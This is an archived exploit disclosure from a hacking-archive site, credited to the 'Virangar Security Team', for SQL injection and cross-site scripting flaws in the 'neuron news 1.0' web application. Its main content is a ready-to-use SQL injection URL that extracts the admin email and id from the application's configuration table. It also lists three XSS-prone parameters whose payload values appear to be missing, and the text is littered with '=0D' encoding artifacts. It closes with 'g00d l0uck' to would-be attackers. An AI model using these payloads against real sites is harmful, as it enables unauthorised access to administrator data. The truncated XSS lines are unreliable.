AOH :: HP Unsorted N :: BX1104.HTM

neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)



neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)
neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)



           =0D
   ####################################################################=0D
   #                                                                  #=0D
   #  ...:::::neuron news1.0 Multiple Remote Vulnerabilities::::....  #=0D
   #                        (sql injection/xss)                       #           =0D
   ####################################################################=0D
=0D
Virangar Security Team=0D
=0D
www.virangar.org=0D 
www.virangar.net=0D 
=0D
--------=0D
Discoverd By : virangar security team=0D
(hadihadi & black.shadowes)=0D
---------------------------------=0D
special tnx to:MR.nosrati,MR.hesy,satan,Zahra=0D
=0D
& all virangar members & all iranian hackerz=0D
=0D
greetz:to my best friend in the world hadi_aryaie2004=0D
------------------------------------=0D
=0D
vlues:=0D
=0D
1.sql injection:=0D
http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/*=0D 
########################=0D
2.xss:=0D
http://site.com/patch/?q=viewtopic&topic==0D 
http://site.com/patch/?q=newsarchive&newsyear==0D 
http://site.com/patch/?q=newsarchive&newsyear=&newsmonth==0D 
########################=0D
g00d l0uck=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.